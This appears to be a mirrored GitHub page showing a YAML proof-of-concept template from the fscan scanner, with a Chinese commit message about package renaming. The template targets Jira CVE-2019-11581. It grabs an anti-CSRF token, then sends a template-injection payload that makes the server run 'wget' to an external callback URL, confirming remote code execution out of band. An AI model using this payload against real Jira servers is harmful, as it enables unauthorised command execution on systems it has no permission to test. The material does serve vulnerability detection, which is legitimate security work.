mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-09-14 14:06:44 +08:00

- 重命名 Common -> common,WebScan -> webscan,遵循 Go 包命名约定 - 修复模块路径大小写不匹配导致的编译错误 - 清理依赖项,优化 go.mod 文件 - 添加 Docker 测试环境配置文件 - 新增镜像拉取脚本以处理网络超时问题 - 成功编译生成 fscan v2.2.1 可执行文件 该修复解决了 Linux 系统下包名大小写敏感导致的模块解析失败问题。
24 lines
1009 B
YAML
24 lines
1009 B
YAML
name: poc-yaml-jira-cve-2019-11581
|
|
set:
|
|
reverse: newReverse()
|
|
reverseUrl: reverse.url
|
|
rules:
|
|
- method: GET
|
|
path: /secure/ContactAdministrators!default.jspa
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status == 200
|
|
search: name="atlassian-token" content="(?P<token>.+?)"
|
|
- method: POST
|
|
path: /secure/ContactAdministrators.jspa
|
|
body: >-
|
|
from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status == 302 && reverse.wait(5)
|
|
detail:
|
|
author: harris2015(https://github.com/harris2015)
|
|
Affected Version: "cve-2019-11581"
|
|
links:
|
|
- https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html
|